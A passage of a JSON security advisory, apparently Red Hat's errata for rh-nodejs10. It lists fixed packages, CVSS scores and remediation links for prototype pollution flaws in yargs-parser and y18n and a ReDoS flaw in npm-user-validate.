"7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-yargs-parser: prototype pollution vulnerability" }, { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7774", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2020-11-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898680" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-y18n. There is a prototype pollution vulnerability in y18n\u0027s locale functionality. If an attacker is able to provide untrusted input via locale, they may be able to cause denial of service or in rare circumstances, impact to data integrity or confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-y18n: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), OpenShift ServiceMesh (OSSM) and OpenShift distributed tracing the affected components are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-y18n library to authenticated users only, therefore the impact is Low.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of y18n as a dependency of yargs. However, no unsafe usage found where the module accepts untrusted input and hence this issue has been rated as having a security impact of Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", 